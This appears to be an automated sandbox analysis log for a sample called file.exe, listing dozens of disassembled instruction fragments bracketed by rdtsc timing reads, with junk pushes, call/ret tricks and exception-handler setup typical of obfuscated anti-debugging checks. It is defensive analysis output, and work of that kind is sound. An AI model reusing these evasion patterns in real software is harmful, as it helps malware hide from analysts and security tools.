Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 453797 second address: 453810 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A0EA8103h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a nop 0x0000000b push dword ptr fs:[00000000h] 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F86A0EA80F8h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c push ecx 0x0000002d jbe 00007F86A0EA80FCh 0x00000033 mov dword ptr [ebp+122D363Eh], ebx 0x00000039 pop edi 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 mov dword ptr [ebp+1244C150h], edx 0x00000047 xor dword ptr [ebp+12478238h], edi 0x0000004d mov eax, dword ptr [ebp+122D00EDh] 0x00000053 xor bx, B7B8h 0x00000058 push FFFFFFFFh 0x0000005a mov dword ptr [ebp+12473ABFh], esi 0x00000060 push eax 0x00000061 push ecx 0x00000062 push eax 0x00000063 push edx 0x00000064 push ebx 0x00000065 pop ebx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 453810 second address: 453814 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 455545 second address: 455549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 454713 second address: 454797 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, dword ptr [ebp+122D309Dh] 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007F86A1919478h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 push 00000000h 0x00000039 push eax 0x0000003a call 00007F86A1919478h 0x0000003f pop eax 0x00000040 mov dword ptr [esp+04h], eax 0x00000044 add dword ptr [esp+04h], 00000016h 0x0000004c inc eax 0x0000004d push eax 0x0000004e ret 0x0000004f pop eax 0x00000050 ret 0x00000051 or dword ptr [ebp+122D3047h], edx 0x00000057 mov eax, dword ptr [ebp+122D0489h] 0x0000005d mov ebx, dword ptr [ebp+122D2EB1h] 0x00000063 push FFFFFFFFh 0x00000065 mov bx, AB18h 0x00000069 push eax 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007F86A191947Eh 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 454797 second address: 4547AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F86A0EA8103h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 456449 second address: 456452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 456452 second address: 456456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 456456 second address: 45645A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 457571 second address: 45758C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F86A0EA8107h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45661C second address: 456620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 456620 second address: 45662A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45662A second address: 45662E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 459589 second address: 459595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F86A0EA80F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45662E second address: 456688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ebx, dword ptr [ebp+122D3CBCh] 0x00000010 push dword ptr fs:[00000000h] 0x00000017 and edi, dword ptr [ebp+122D3B48h] 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 pushad 0x00000025 mov edx, dword ptr [ebp+122D3323h] 0x0000002b mov dword ptr [ebp+122D3638h], ecx 0x00000031 popad 0x00000032 mov eax, dword ptr [ebp+122D16ADh] 0x00000038 mov edi, dword ptr [ebp+122D3CE0h] 0x0000003e push FFFFFFFFh 0x00000040 nop 0x00000041 pushad 0x00000042 jmp 00007F86A1919485h 0x00000047 push ecx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 459A97 second address: 459A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 459A9B second address: 459AB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F86A191947Eh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 459AB6 second address: 459ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45ABDE second address: 45ABED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A191947Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45ABED second address: 45AC00 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F86A0EA80F8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45AC00 second address: 45AC11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A191947Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 459D70 second address: 459D75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45AC11 second address: 45AC1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F86A1919476h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 459D75 second address: 459D7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45BB4F second address: 45BB54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45BB54 second address: 45BB7F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F86A0EA810Dh 0x00000008 jmp 00007F86A0EA8107h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jng 00007F86A0EA80FEh 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45E9B9 second address: 45E9BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45E9BE second address: 45E9C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45EFC2 second address: 45EFCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F86A1919476h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46105D second address: 461061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4620BD second address: 4620C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46023B second address: 460240 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4620C1 second address: 4620ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F86A1919488h 0x0000000f jne 00007F86A1919476h 0x00000015 popad 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45BCEF second address: 45BCF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 460240 second address: 460245 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 460245 second address: 46024B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46024B second address: 4602D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F86A1919478h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 and bl, 0000001Bh 0x00000025 push esi 0x00000026 add ebx, 0CBB8B43h 0x0000002c pop ebx 0x0000002d push dword ptr fs:[00000000h] 0x00000034 jmp 00007F86A1919486h 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 sub ebx, dword ptr [ebp+122D2BDEh] 0x00000046 mov eax, dword ptr [ebp+122D0BD1h] 0x0000004c jnp 00007F86A1919489h 0x00000052 jmp 00007F86A1919483h 0x00000057 push FFFFFFFFh 0x00000059 mov di, FD8Dh 0x0000005d nop 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 jbe 00007F86A1919476h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4602D7 second address: 4602DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4602DB second address: 4602E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46220E second address: 462213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 462213 second address: 46221D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F86A1919476h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46422A second address: 464234 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F86A0EA80F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 464234 second address: 4642ED instructions: 0x00000000 rdtsc 0x00000002 je 00007F86A191948Bh 0x00000008 jmp 00007F86A1919485h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F86A1919478h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c xor edi, 3A6E56E2h 0x00000032 push dword ptr fs:[00000000h] 0x00000039 pushad 0x0000003a sub dx, F3B5h 0x0000003f sub dword ptr [ebp+1244C150h], ecx 0x00000045 popad 0x00000046 mov dword ptr fs:[00000000h], esp 0x0000004d call 00007F86A1919489h 0x00000052 pop edi 0x00000053 mov eax, dword ptr [ebp+122D1025h] 0x00000059 mov edi, 7C03DD2Bh 0x0000005e push FFFFFFFFh 0x00000060 push 00000000h 0x00000062 push edx 0x00000063 call 00007F86A1919478h 0x00000068 pop edx 0x00000069 mov dword ptr [esp+04h], edx 0x0000006d add dword ptr [esp+04h], 0000001Bh 0x00000075 inc edx 0x00000076 push edx 0x00000077 ret 0x00000078 pop edx 0x00000079 ret 0x0000007a nop 0x0000007b push eax 0x0000007c push edx 0x0000007d jnp 00007F86A1919478h 0x00000083 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46C527 second address: 46C55B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F86A0EA80F6h 0x0000000a pop esi 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f jnp 00007F86A0EA810Bh 0x00000015 jnl 00007F86A0EA80F6h 0x0000001b jmp 00007F86A0EA80FFh 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 jne 00007F86A0EA80F6h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46C91E second address: 46C963 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b je 00007F86A1919476h 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F86A1919486h 0x00000018 popad 0x00000019 pushad 0x0000001a ja 00007F86A1919476h 0x00000020 jmp 00007F86A1919482h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 471F6F second address: 471F7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F86A0EA80F6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 471F7A second address: 471F8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F86A1919481h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 471F8F second address: 471F93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47205D second address: 472062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 472062 second address: 472098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F86A0EA80FDh 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 jmp 00007F86A0EA8108h 0x0000001a pop esi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4721B1 second address: 472202 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A1919481h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jg 00007F86A1919484h 0x00000014 mov eax, dword ptr [eax] 0x00000016 jns 00007F86A1919488h 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4781D2 second address: 4781D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 478761 second address: 47877A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A1919483h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 478950 second address: 4789A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F86A0EA80F6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F86A0EA8104h 0x00000015 pop edi 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 push edx 0x0000001a jmp 00007F86A0EA8104h 0x0000001f pop edx 0x00000020 pushad 0x00000021 jmp 00007F86A0EA8104h 0x00000026 pushad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4789A7 second address: 4789AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4789AC second address: 4789B6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F86A0EA8102h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 478FC8 second address: 478FFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jno 00007F86A1919476h 0x0000000e push edx 0x0000000f pop edx 0x00000010 jc 00007F86A1919476h 0x00000016 popad 0x00000017 push ecx 0x00000018 jmp 00007F86A1919484h 0x0000001d pop ecx 0x0000001e popad 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 ja 00007F86A1919476h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 479160 second address: 479164 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 479164 second address: 479173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007F86A1919476h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 479173 second address: 47917D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47917D second address: 479193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 jg 00007F86A1919476h 0x0000000c jno 00007F86A1919476h 0x00000012 pop esi 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47942B second address: 479431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 479431 second address: 479439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 479439 second address: 479461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F86A0EA8109h 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F86A0EA80F6h 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 407259 second address: 40725F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 40725F second address: 40727A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F86A0EA80F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F86A0EA80FBh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 40727A second address: 407284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F86A1919476h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 407284 second address: 40729B instructions: 0x00000000 rdtsc 0x00000002 js 00007F86A0EA80F6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push edi 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47F0D9 second address: 47F0E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48491C second address: 484928 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4836C3 second address: 4836C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4836C9 second address: 4836D3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F86A0EA80F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4836D3 second address: 4836F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F86A1919476h 0x0000000e jmp 00007F86A1919481h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 483C04 second address: 483C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnl 00007F86A0EA80F6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 483C15 second address: 483C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48345B second address: 483461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48462C second address: 484630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 484630 second address: 484666 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jnl 00007F86A0EA80F6h 0x0000000d pop edi 0x0000000e jmp 00007F86A0EA8101h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F86A0EA8100h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 484666 second address: 484680 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F86A1919476h 0x00000008 jmp 00007F86A1919480h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 485F3F second address: 485F6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A0EA80FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F86A0EA8105h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 485F6D second address: 485F77 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 488CF9 second address: 488CFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48D31B second address: 48D32B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F86A1919476h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48D32B second address: 48D352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F86A0EA8106h 0x00000009 pushad 0x0000000a popad 0x0000000b jns 00007F86A0EA80F6h 0x00000011 popad 0x00000012 push ecx 0x00000013 push edi 0x00000014 pop edi 0x00000015 pop ecx 0x00000016 rdtsc
